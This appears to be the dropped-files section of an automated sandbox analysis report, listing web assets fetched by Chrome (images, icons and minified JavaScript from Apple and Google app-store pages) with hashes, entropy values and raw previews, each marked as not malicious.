                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                                                  Entropy (8bit):6.21412173346687
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:HW7QHJt9yT9kf/4ktWb0mWGlBp9bPefQMGDnC7Lm/xq+1De2v:20HY6/490mWGnpdefnGwLmY+pee
                                                                                                                                                                                                                                  MD5:DFA85BB1FD633C2AB91C0FE07586DA95
                                                                                                                                                                                                                                  SHA1:D83ABDEA02E3DC7F9B84841FEC376FA378C0AEC8
                                                                                                                                                                                                                                  SHA-256:0D3B03B6B3A5D8D93F2E8E420352906459A9DF4A19A34ACCAC281E7EF1D07856
                                                                                                                                                                                                                                  SHA-512:4904E784AB20B9A14BC4423176DF9F7830DE254619AF574E20151EE9831C1E11E6E5B34A7B816BF75380C4D2D1D3D0330154D13D1745BE63EDAE20048B32758C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:............ .h...&... .... .........(....... ..... .................................t..9}..r...........x...l..._...U...Ox..TR.se9.:............U...d...o...j...g...c...\...S...H...@...Bb..WM..m7..z,.....;..8C...H...R...................................ZE..m/..|...}-.97..t6...9..........................................r1......./.?q..0v..{.......+..."....t..%n..)b..+R..<H..T?.......v..x'.../..Mf..:c..........'k..0o..................RA..[).........x&...0.._U..LS..........2U..........u{..zv..........b..........|&.../..vD..bA..........KG......}s..N8..V....g......l#..........&.......7..}0.........c3.......h..g&..k"...d......s$..........%.......8...-.........v!...........c...d..........t...........%.../...;...0.........)...1.......................t..........'...1...;~.5..........4...+...$...*...).......u...u.......x...+...2...;rt.<z..>~...................................6...4...4...@d8.Df..@i..Dp.......................z...7...3...6...6.9.....US..[V..[Y..QW..J]..G
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (1328)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):349993
                                                                                                                                                                                                                                  Entropy (8bit):5.357908617608227
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:IaurdhEIEvAr/1G93xWLF+cqt6UqZSebMIzb7CnBWQahL:Ifr/1G93xWJnH7EWQ8L
                                                                                                                                                                                                                                  MD5:E3898CF886FE061B936CBEA3F51E872D
                                                                                                                                                                                                                                  SHA1:31D6E7833F1FFC22993E1B8B1A3C56C9A19EA89A
                                                                                                                                                                                                                                  SHA-256:2C30DDD4EA9E0B822C9A01C8E83DAEEE51AE059665BD4507CD382017E8E8B1B3
                                                                                                                                                                                                                                  SHA-512:E18A69D9F735007B8B4B5042A02378B78972A71AF54543B44449B07BCA2A8E806945824749EE217B35DEC00B31BA759D69652AD0317210C29C17DA812D233780
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*! For license information please see chunk.739.25e60d65f7e9bdd75f12.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[739],{2353:function(e,t,r){"use strict".r.r(t),r.d(t,{KNOWN_CAMPAIGN_AND_AFFILIATE_QUERY_PARAMS:function(){return n},KNOWN_MARKETING_QUERY_PARAMS:function(){return a},METRICS_REGISTER_ENDPOINT:function(){return o},MUSIC_AFFILIATIONS_ENDPOINT:function(){return u},PROCESS_REDIRECT_URL_ENDPOINT:function(){return i},TV_AFFILIATIONS_ENDPOINT:function(){return s},default:function(){return f},handleCampaignAndAffiliateUrls:function(){return c}}).var n=["affC","adId","advp","at","ct","itsct","itscg","itscc","itcCt","its_qt","ls","partnerId","pt","qtkid","uo"],a=["mttn3pid","mttnagencyid","mttncc","mttnmyad","mttnmyadg","mttnmycmp","mttnmykw","mttnmypla","mttnmypub","mttnmysite","mttnpid","mttnrefid","mttnsiteid","mttnsub1","mttnsub2","mttnsub3","mttnsubad","mttnsubadgp","mttnsubcmp","mttnsubkw","mttnsubpid","mttnsubplmnt"
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1015)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):994627
                                                                                                                                                                                                                                  Entropy (8bit):5.471886698451695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:qBoMXaFHzsbqCI4/LdRb8uCjZqXVUBkxd:qW2/LEtgUCxd
                                                                                                                                                                                                                                  MD5:AEF9FA34A5CA723671AB2D0AB1876E84
                                                                                                                                                                                                                                  SHA1:ABBCDBB2BA05ADF02C01145282F4465CF5B1BB4F
                                                                                                                                                                                                                                  SHA-256:48804C8E534CE15D25417DAC18E4744E82AEA8C7EA4D7BD55522A395D16BE1E6
                                                                                                                                                                                                                                  SHA-512:3C79D9179B86DE0077CBD3114A1352466579D40EB372278CC9648F511C66D3C4F252C813A1638181D1DBFE107C5E38ACD76C3B26872C547E415A8546277F91A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:window.EmberENV=function(e,t){for(var r in t)e[r]=t[r].return e}(window.EmberENV||{},{FEATURES:{},EXTEND_PROTOTYPES:{Date:!1},_APPLICATION_TEMPLATE_WRAPPER:!1,_DEFAULT_ASYNC_OBSERVERS:!0,_JQUERY_INTEGRATION:!1,_TEMPLATE_ONLY_GLIMMER_COMPONENTS:!0}).var loader,define,requireModule,require,requirejs,runningTests=!1;(function(e){"use strict".function t(){var e=Object.create(null).return e.__=void 0,delete e.__,e}var r={loader:loader,define:define,requireModule:requireModule,require:require,requirejs:requirejs}.requirejs=require=requireModule=function(e){for(var t=[],r=c(e,"(require)",t),n=t.length-1;n>=0;n--)t[n].exports().return r.module.exports},loader={noConflict:function(t){var n,i.for(n in t)t.hasOwnProperty(n)&&r.hasOwnProperty(n)&&(i=t[n],e[i]=e[n],e[n]=r[n])},makeDefaultExport:!0}.var n=t(),i=(t(),0).function o(e){throw new Error("an unsupported module was defined, expected `define(id, deps, module)` instead got: `"+e+"` arguments to define`")}var a=["require","exports","module"].
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9204
                                                                                                                                                                                                                                  Entropy (8bit):7.97905201911326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r38tDAWM+egFJt4NPfYUfooEMAY7scQNv1Ees8:gF8frfooLoR95
                                                                                                                                                                                                                                  MD5:8F712478B03F2C4DA3183F96248AD1FE
                                                                                                                                                                                                                                  SHA1:BA6CF6860F9657FD1F1B8E1BB660A39B589AB0B6
                                                                                                                                                                                                                                  SHA-256:5AAC149EED4335B87CAE2FF3E177FBB55D5CE17B49D27A4A5CDAC61A5B89C72B
                                                                                                                                                                                                                                  SHA-512:ADB03392D73F6DEA6C1505D622E34C8F068447E1507DC964EB429F81D2839517F1210AD7156BF01875EEAC8B082126E1C12DA2BC5B643873A89352410876081D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.#..WEBPVP8 .#..0~...*..(.>Q .E#....FD8......6...?#...y........v...O./$........W|....K.w.....{.~......a..O./.....{......E........X..................................?t..............O.}.........|..e.................g...$.v4..oP_m.....'...g.~..l.........?U..xZ......._....~=}6.K.....W./........k......l.]..?...?^..%A7.U...i..Z....X......]....R...z.4X....so...U.G.?.Y......x.G..n.!.V...Y5$.+.].p..?).V.k..@.X....Uh...C.Z...k.Pz.1.).|n.c*.....V..5.J.....`)..c.....C..) ....":..I.G.6.....%.0!.h.....hc.d|.s%.D.g..-..H.V.l.a..=..Cz.\./..V...<.~jB3<..d..g..U.g.H:..[.hsh.........w...S.ov.....Q.D....6....5.lE.&.d..`A.5~.h....o.t[.f.H.!N....[."..0..+..b.G^.......0.........l..r..$]...9.D.W...a.&G.n$......hS.......ZRM.3MLe.EW..nQEpl..u...Y.K..........91...[b<.vi~U^......B$..V.....m.Z@.w5.k..k:..f].zoN....O..q.....I..jr..a...H:#.....l.Nl..Q...4DRo......P..5...$..$z.........E..vs.g[q.U....r.v:.(.>..dGx.......q.V\.....E.m.....J.1.".......<..y....u....f3.g.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):148
                                                                                                                                                                                                                                  Entropy (8bit):6.523312318185472
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:clyg1ZreK5l1GzQ9O9xbSj0hGqBBs+dK484MVYQkGAKAJlJwBNlWn:coWZaKBUdSghtBfI43M0VJlJkWn
                                                                                                                                                                                                                                  MD5:F6FCD4D43487A3BF8F47A592569FAFEB
                                                                                                                                                                                                                                  SHA1:22B1887F1C703EA9ED827A59B02AC7FCDF79CA54
                                                                                                                                                                                                                                  SHA-256:C6AEC5614A1193CCECA829712C4027C6F1B94A106395D2223229861AE110A9A4
                                                                                                                                                                                                                                  SHA-512:98ECA13BC52869440EE4319FD09AB3C076EFBD51F769052B8C85571236355E50D5426F15CFD67F4DC1942D07D72A0BF0706ACADBDFC5CD2082645CF746778443
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../......j.....]@G....51..C..G.3..<...w..#.O....{.P...I).......T./]......}..1^..|.~.}.B..B%.JP..%.\..%..$..K.Y,".\../?#..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):4000
                                                                                                                                                                                                                                  Entropy (8bit):7.931265896262218
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:SMHmIlIS5csGeXxMdTo9mnsoDJbmDLYbX:SSmIlB59GeXaGkZBmDMbX
                                                                                                                                                                                                                                  MD5:5B494C32A2CE1E16BE3CDDF444DDEAD3
                                                                                                                                                                                                                                  SHA1:F45613851DD0605F3AE2155A668EE0C2BA7AF39D
                                                                                                                                                                                                                                  SHA-256:B068E090E697BD9690143866D3272EEA4A18B76BE7E9307AAABED15B498D10ED
                                                                                                                                                                                                                                  SHA-512:BD5A399F3B379A94CA96FA95C61BC4610D6D61EE02AB4C5AA2CB27FB1D8A5C7FB699F781E9C5CD6AAEC1E32047F1DD37C5221D7EAB84AACB814B1BEF6153200D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/45/63/1c/45631cea-499d-7f62-74ce-b282dfdd0a10/Prod-0-0-1x_U007ephone-0-1-0-85-220.png/230x0w.webp
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X..............VP8 ....pJ...*....>.N.H.....2J.....nw..&...k.WX'......n.p._.?...........1.O.+.?.g....V.F....~.|..^...................Y{.X`..y.;....8[wO_..;.cmO:.C..f.8.....l..~./0.......(.../4...\.95......W{M....t<.O.0.5..DPi.;.....n/..6..h.o./..x.g..5..&..U..EU.z..?`.E...p.&wG."}.}..;O:.^d..j...r.n......5..L...:..*gt.Rtnig.=.w..Q......X...s...;.O3....E..k;W3.A..)...tGp......'..n....2..2y:..4....>M.....n.......Gf.m..!HHy..ra;#x<&*Nj...^.&..B../<.sA..\.&|.......$.. ...+...P....N..S...S+[..v...`{..s.....g1.tb...{..Z...b"Q....aT..`|[gFd..@....2.t..,lE.C~...^.~7.4.)AN.....cX.4P}....1V(?..'.ijTn`....#../.C.T[..B..O7\..{FK...p.:...........D./g..m.......b&p.g?...>I1...musO.NA..H..T..u.../...3......!>-..Cz.~...S...+..>..T.@.u..S.>`.5....O....".Aq..q.4...E..,....~..+.u..%.....d.....@...@0xI1...4.C.6~. 4..Uw%;\.,........t..g.....D0.l.G.L......~...0&..*.S.....pl..........Z..+.l.O....<d>#S.4..i..2...Q..\../.j...5i..<.T..ev..'......~.......
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3003)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18440
                                                                                                                                                                                                                                  Entropy (8bit):5.255534167782927
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:kz8E0CXVpU4y7FeTEkrHfcBkoNiIvYcaSRCF+q4nAHY+6dDlqW1hCSallZsWY:kz8E0CXVpU4y7ZkrHfcBkSiIvYc/Re+J
                                                                                                                                                                                                                                  MD5:5F765A4A59A407D5DAA33CC0B48F2A35
                                                                                                                                                                                                                                  SHA1:44E29FDCCC78BAD49465D30F2AD9D5DE816AE150
                                                                                                                                                                                                                                  SHA-256:5C98E1CF88ADBADBE52321041E084AA2D5BC4DAAFFBF8EC6C45A438E8D393202
                                                                                                                                                                                                                                  SHA-512:ABD01A44A94A0BE2B000DB5BB60A439AFDA8948B32B3F0685AC9AFE175EC9E3701C3747457BE42032C1EA0707AF02109D46187FCA39F2815BD8AEDBBD365F38C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[934],{7934:function(e,t,r){r.r(t),r.d(t,{default:function(){return W}}).var n,o,a=r(32722),i=r(24178).function s(){return o||(o=["app","appVersion","hardwareFamily","hardwareModel","os","osBuildNumber","osLanguages","osVersion","resourceRevNum","screenHeight","screenWidth","userAgent"].concat(["delegateApp","hardwareBrand","storeFrontCountryCode","storeFrontHeader"])),o}var p,c=i.SC.attachDelegate,u=i.Z_.cryptoRandomBase62String,l=i.Z_.exceptionString.function m(e){this.setDelegate({topic:e}),p||(p=!0,s().forEach((function(e){m.prototype[e]=function(t){return t&&t.hasOwnProperty(e)?t[e]:this.environment()[e]()}})))}m._className="eventHandlers.base",m.prototype.setDelegate=function(e){return c(this,e)},m.prototype.topic=function(){throw l(m._className,"topic")},m.prototype.environment=function(){throw l(m._className,"environment")},m.prototype.eventRecorder=function(){throw l(m._className
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):149756
                                                                                                                                                                                                                                  Entropy (8bit):7.989238660408578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:VcA3uwoHMMbvFz64XTGbnzQd3jGFqtIlL40yf15Q:VtuwosMbNz6Up3tIh2jQ
                                                                                                                                                                                                                                  MD5:E05D2BCF282C4E29A516688740FAEE8D
                                                                                                                                                                                                                                  SHA1:65820D150DABE2D37AF5DAE46197719839D080A8
                                                                                                                                                                                                                                  SHA-256:F0B676B1B1AF7B64C39271D887DC07E70F8FEAF475A7D459B6DB30F258FDA4AB
                                                                                                                                                                                                                                  SHA-512:FB7F833AC8C12FCF9873C1308994B68CE1E5AA70118B4CA545AA54531449437823E0FC93867BD0C7EF556CF6B9C8ABD47E22DCEAC188E79305D0A8BADE01B65A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/_T2WgYqgPLhE4WBKsH85VwWFzN8tCiVwGRnEvq92u_sjcphUK7vpXETasL_reqU-YA=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.H..WEBPVP8L.H../..I.MH.d;l..G..@......$.D......:...T].t_w......{..9....ZU............}%..Zk...d.@.}....y......$%]H...Z.^.....u:)]...j..QUwGj..$2V......8......7..b........v.....W.ZIK.&~...H.V..F.6...)I..Fz$....F...I.!......}.e{.K....;czs.l.......~......o1..uB../.9g...........G.1.d;.W......hc.=......R.@.@P3YF.| ..s.....)-......,$.w...=Y........k...N.I.Z+F...\u .I.Z.I..n.0:..I@Fw7H......f.>4.R.|.|....l.$k.....|h.Ef'.t.Ww.$y.D...K..+IV.m.Z.s!.CG.... $..Iw.1j.. .Y.`$i...7.d.4.a..b...@..p....... . ].w......v...?...B..K.u...d.^..\W.....G. .$.$...V.....3.*i&.$.HI.*...wU....<d.SJ.(....9.ZS..[...|AK.$I.......g..5I.$F.8....,g.l{..m]..D.........B=.G....Q.....L..E.!.0.m.n....$.rZy..}.W...Pv.9-Z..Ap....?...~N...[..H....B..R.....a...x(.p....\......*..........#.S........E..!...............".< PB?.X...!.xK7G..........@....A:`wpp$.....P@C..\7Y...........m....n...3..O......B... .a...p.......!....?"5.+.....[.n.?\......3gn..wq......9sk...E1$U(&d,P...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198604
                                                                                                                                                                                                                                  Entropy (8bit):7.991562366774542
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:5dx+LXb242Jf1pb1BrXQrdMX3lZhCTxDKVq:Ym42Jf1p7aihwj
                                                                                                                                                                                                                                  MD5:CCB4128F1871BB6AA79F84420107C28D
                                                                                                                                                                                                                                  SHA1:C34DCCE326A2E7D205049DDB9F2F4B30DF0CAB2B
                                                                                                                                                                                                                                  SHA-256:066E40A4D44155DAFE9636BE361056E055472B777D7D5324894A1921A68D75AB
                                                                                                                                                                                                                                  SHA-512:982EBFAFCAE5B2F1E14C5D51D165336F913AE1F46A8CF492A59F0A140A719A64CFA3050839560BDF9AB4E327DA3DA6E91604EB6C14B219403166780E429474AF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.M@.d+l.{...../X8..".?...?w.{.*u..>...H...SM@............Ib...+.1p.y.S.E.W|.V....fN.Z....>.;.....I..:.._.\...K'..$O/M.QO}4_..I....."c..U5..w.....,5.....g<O.d.....'.g.W....;..7..'}b.$+...t..'.1;|...kiu.P....>...k%....!O..Y._.....YI>.G P.$....O.^...DGLT..j.e....;....*...bV..tf....V.W.V'..y?;.V....4O...A`..s&.%|...I.J|A......=w...V....Z..&.zy.;..-...O.X....#..z.k.@;'...J.{tvL...?..!L........9.0Q..z.ObU.P.1.i....J. .......@7.g...&1.}e.....>..0.Jf.n.0....s....8..._zVW.['.H.[N;.U.Z...........;0.@mN]..O[..d.c.<0.q...Y).R.....>....3a.Sw`.y...L..;.2.U......N.%..6..9...>'.....1.9..3A.*6....AAaL.g&hw....SUu...T...c.u..BI.$..p........AR.'p.EQ.A..u.....h..[DD)%v.~............RJ.b1M.4,...m{.H...!0.t..l.... ..AU]W.{...6.B(.?A.................N@.r..^....../..n........O.(.>.......&....;)....@..........&|......*E.d.%z..r..;.8...`.p4.....FB|B...hx@...$....H.d.....=qO.A.../X....mQ..ND..#.9.........y.:..n..f..h..A..F.z.nt..Cq...;... N.C....`%
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9496
                                                                                                                                                                                                                                  Entropy (8bit):7.968542570130689
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5nmUWvyhK0r7jdv7WVogGRZbHRzIJzLll5ZGvkqb5c02G1zOyiFYEDf:5njK0j57o7GjbxMxLll54vhatsSjFRT
                                                                                                                                                                                                                                  MD5:E3A7F799157D28C4BA2C4F66F5041446
                                                                                                                                                                                                                                  SHA1:330EE3FE5553F703512FF84A163A3F0F31FB3017
                                                                                                                                                                                                                                  SHA-256:BC11AFB3F580AD7E5A97A72115AA84353FF5D2D030A4375AD72A9C3EF42DE96B
                                                                                                                                                                                                                                  SHA-512:018433468EC2FC405B91FFC96C24F662D087CE9648A3073BA8E266F3E702B8E733F17A5A14323CD6B261DB1B002D528D3D559FFBAA63BAE589958F30AC0DDBB2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/EL5-xK3KLbjgT36SiHKjECG7SL7RlMomiHO2ykqxhzclTTyKHIXMA0-PnshzElEHUpA=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF.%..WEBPVP8L.%../?.....m.F....f......?;.jL,KaK.|............$).gf....m.?...q$IN.h, ..<..d..F..)..................7.......=...Df...18U._..."...H..(.y"...a..4.......y..]KI....f%.t...s./[.rc...V.:..j.2i...]S..I...k.V.d.}.4.:.7.....4.....|B..J.m...zp'..V...0...t.. .K..,@.d./...Um...n..)..!.h.TCD.....C...'..m........3$.......k#v...m../c..b'{...=.q;...zZU].....a......F...."K..).9..M]ff..Rr...w....K.....Cf.#.,...3...m.n[.}.}.%.N\;.....>333333333....|HJ.C...!.%=...'..m......p5.]f.$....^#..;..F.[.b...d0..?2...d.-....@..K..............T.f..@ &"`fG.s6.. .3.R..d...U..R*s%HST..3....k.@..............P`.!.&0@(0f.(..."..7 .lV.*U...D.k.".3....\...^.8G..S.."F..B.*......!.`..z.N.S....I&0...0i.P.r..Q5XQU.....3..H....=5..G>."....x&|..\......!.h..@6.;k_].........9....u.vnd.*|.... I@D...TU..r..@._.....Z<f..R...%.yQ........j.....'o.[...f^B.YD.l6|=..W......B.....o...@......v..._.].c.....A0..$Ywq.^........_o_t}=.~.q..3.*l..8q....`....V...;sO..]...............
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):41304
                                                                                                                                                                                                                                  Entropy (8bit):7.995535053765422
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:xyfkmN6tqajEb93TjpO68hx3JJ+3s6lFCJBygYZ8jV/N6oRnnY:fmQqhDlO68h0tlFPIFN6mnY
                                                                                                                                                                                                                                  MD5:0A67BC11B18BC5596A6770EDD500EC1B
                                                                                                                                                                                                                                  SHA1:3DFC3A4CFCFF7FB16174A474BD7CFFE602C39D2F
                                                                                                                                                                                                                                  SHA-256:87E7BBF970C708CEBCCA00D6E61B46D4566C95BB256BB80C79C92A7559142FE9
                                                                                                                                                                                                                                  SHA-512:CDF995736F06862267691B92ABE587721FB3F16E14452ECEB1A473A7FAF66107370AFCAAD8E64A7F2F298889C6B9E9E58B6117CF582FFC9A1EC9B6C65960DD80
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFP...WEBPVP8 D........*..(.>i*.E."..+Nt@...5M.{..v`......{...g...|}Yh/..K}?.>..................O~....?.......=..............;.....w....^.?........................................W.o..`......?.p....'.........s..{.c..O.=J.{..._.x.3>..Q.{.......[.'.?...w.....~q................/...........3.....^.....o...?u.....`.....c.....|S...7............,.............?....i.!.....O._................~._..........z.&`.3.8.....!......f.E...H9b....C.F.g9....w(..f."........Ki(...{..j.V.%....%.J...S..wZQ.&..q3......w(.}R...rq.Ek........?..>..?..J..2=.=.,.sq'..{.4.jz!...g...BZ%.....Q)...:.R.35.......U...c.7....,[*$x..me'..I#.......(6N..I..Cx.j...".r..{A.@.x. .8s.r...m.->1..n.......A.....6..0Xj.._..Z.5.]Gb..*..r....7.'..{......c}F$OI.f..vW..@._....ns;.XM3.n?.....W....~.q..p..............W.c..#..x........L.~E.w.6......U>c.y(....M.l..!....&n`.v....5..-.+.j..uC;.v..4...a...'.=..Lqx......?v...BQ........]5,.sTf#.g...~.6>...U.djZ...h......,..J......-.'A.....]Q.lj..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1283)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):62120
                                                                                                                                                                                                                                  Entropy (8bit):5.200233203039825
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:rPksmcJcApCeZygCoEOuTudKEEB8xAnpFyS5eCyDvmojEWCykh5kNbeAFjg5gvC8:rPksrJCeZygColbQJL5/U
                                                                                                                                                                                                                                  MD5:3EA70AE6D554F9FC0FFB8CB0281EC0A6
                                                                                                                                                                                                                                  SHA1:58D41E45856B15260F69F19200B6DE7FDCBC82E6
                                                                                                                                                                                                                                  SHA-256:A5B0CC4EF0FF84660C52A703030A8F948CC8702EF6B0535CC31FF8611823DBB9
                                                                                                                                                                                                                                  SHA-512:00E5EA6FF4C91E1419C4F7FE95815E67C11EDE4849810C2F3371E694622084D439F0E73C855101CB0A1A5B516A8821DE3B2EB1AEB450325F8A38E3EF3B9CC19B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.171.ce33468efea141bac957.js
                                                                                                                                                                                                                                  Preview:/*! For license information please see chunk.171.ce33468efea141bac957.js.LICENSE.txt */."use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[171],{70171:function(t,e,n){function r(t,e){(null==e||e>t.length)&&(e=t.length).for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n].return r}n.r(e),t=n.hmd(t).var o=function(t,e){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)}.function i(t,e){function n(){this.constructor=t}o(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var a,s,c=function(){return(c=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]).return t}).apply(this,arguments)}.function u(t,e){var n="function"==typeof Symbol&&t[Symbol.iterator].if(!n)return t.var r,o,i=n.call(t),a=[].try{for(;(void 0===e||e-- >0
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):36901
                                                                                                                                                                                                                                  Entropy (8bit):7.965499363084098
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:r3TccP24cnKiDwOpmB5s84Ye6qfWmG6ldF5eDt9LUHwVFCKKlY:r3TCXKxBgYe6qfWmG6l1eDT8KK6
                                                                                                                                                                                                                                  MD5:4D5AC3416F4786384C02A37E65A7CEB7
                                                                                                                                                                                                                                  SHA1:D9D8D26711B56222E5A59AD593B7609C23B50EF8
                                                                                                                                                                                                                                  SHA-256:BE97356CD7C083757498B687F9C02B00E35E44C2863B25F41DC93DC00F425748
                                                                                                                                                                                                                                  SHA-512:435BCFCB73BBB5FA5516B5EB6825B24C226DCDB67EFCD29FCCADD4B7B36D502057B0F85909EAED71AB9CE0838C373B2921668A046ECB190999897C6B253B142F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/KHfEG-2pIEI/hqdefault.jpg
